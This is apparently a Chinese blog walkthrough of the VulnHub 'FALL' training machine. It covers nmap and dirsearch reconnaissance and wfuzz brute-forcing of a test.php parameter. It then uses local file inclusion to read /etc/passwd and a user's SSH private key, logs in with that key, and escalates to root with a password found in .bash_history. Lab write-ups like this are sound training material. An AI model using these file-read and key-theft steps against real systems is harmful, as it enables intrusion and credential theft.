当前位置: 首页 > article >正文

FALL靶机攻略

1.下载靶机,导入靶机

下载地址:https://download.vulnhub.com/digitalworld/FALL.7z

开启靶机。

2. 靶机、kali设置NAT网卡模式

3. kali扫描NAT网卡段的主机

kali主机

nmap扫描:nmap 192.168.92.1/24

判断出靶机ip是192.168.92.133。开启端口:22、80、139、443、445、3306、9090。

4. 访问开启的端口

80端口,页面是一些消息。

在多条消息记录中,多次发现Posted:qiu。猜测“qiu”可能是一个用户。

139端口被限制,无法访问

9090发现服务器登录框,但无数据登录

5. 扫描敏感目录

 dirsearch -u "http://192.168.92.133"

发现多个页面,/admin/login.php、/assets/、config.php、phpinfo.php、robots.txt、test.php。

6. 访问网页

/assets/,发现目录,但里面没有任何信息        /phpinfo.php、/config.php  页面无显示

/robots.txt  无敏感信息

/test.php页面,弹窗显示:缺少GET传参。说明这里存在注入。尝试寻找参数。

查看网页源代码发现没有。

7.爆破/test.php页面的参数

使用kali的wfuzz工具可以爆破,同时wfuzz自带字典。

在/usr/share/wfuzz/wordlist/general目录下存在多个字典,这里使用big.txt。

cat big.txt

爆破参数:

wfuzz -u "http://192.168.92.133/test.php?FUZZ" -w /usr/share/wfuzz/wordlist/general/big.txt --hh 80

爆破出payload结果为:file

8. 利用file参数 查看文件/etc/passwd

http://192.168.92.133/test.php?file=/etc/passwd

发现 /bin/bash  可登录用户  只有root  和  qiu ,这里证明之前看到的qiu的确是用户。

9.  查看qiu的 ssh 密钥

http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa

10. 将ssh连接私钥的页面内容下载到kali

输入:curl http:/192.168.92.133/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa

11.利用用户qiu和ssh私钥进行连接靶机

查看文件权限:ls -l   发现id_rsa文件没有执行权限

远程连接:ssh -i id_rsa qiu@192.168.92.133

但这里warning说,私钥不能被其他人使用  

所以修改权限,只有其拥有者才有权限,其他人无权限。即600

修改私钥文件权限:chmod 600 id_rsa            【

【600:即 - rw- --- ---】【用户有:rw- , 属组和其他人均无任何权限---】

再次连接:

ssh -i id_rsa qiu@192.168.92.133   连接成功

执行whoami命令,发现是qiu

12.查看历史命令,寻找其他敏感信息

cat .bash_history

竟然发现  sudo  强行提权的信息,存在可疑密码“remarkablyawesomE”

利用这个疑似密码,尝试提权

输入:su - root,密码:remarkablyawesomE

提权成功,执行whoami,得到是root用户。

FALL靶机练习结束!!!

温馨拓展:FALL 有 秋天 的意思哦!!!  金黄的树叶、赤红的枫叶,秋天的风景不错呦。

    这次靶机,开局很轻松,ip很容易扫描出来,但给的目录很多,解决方法或许也很多。但本人参考其他攻略,按这种方法练习下来。仅供参考。。。希望有所帮助。

                                                                                                    --------------------2025/3/27  21:41


http://www.kler.cn/a/613126.html

相关文章:

  • B/S阅片项目算法梳理
  • 蓝桥杯省模拟赛 阶乘求值
  • OMI(operating mode indication)
  • 攻破tensorflow,勇创最佳agent(1)---学习率learning_rate问题
  • Java + LangChain 实战入门,开发大语言模型应用!
  • ThreadLocal与Cookie + Session?
  • C++调用Openssl 报OPENSSL_Uplink(503EE220,08): no OPENSSL_Applink
  • python 将mkv格式视频转换成mp4格式
  • vs 2022安装指南
  • 3月28号
  • 青少年编程与数学 02-011 MySQL数据库应用 17课题、事务处理
  • RabbitMQ三种队列深度解析:区别、场景与未来趋势
  • 食品计算—Nutrition5k: Towards Automatic Nutritional Understanding of Generic Food
  • 【Uni-App】嵌入悬浮球全局组件的详细教程和防踩坑点
  • Centos7 安装 TDengine
  • php调用deepseek接口api并流式输出
  • 阿里OSS使用指南!
  • python算法:leetcode二叉树相关算法题
  • bluecode-螺旋阵列的神秘艺术
  • 【Python】工作笔记:返回当月第一天、昨天;上月第一天、当天;全年节假日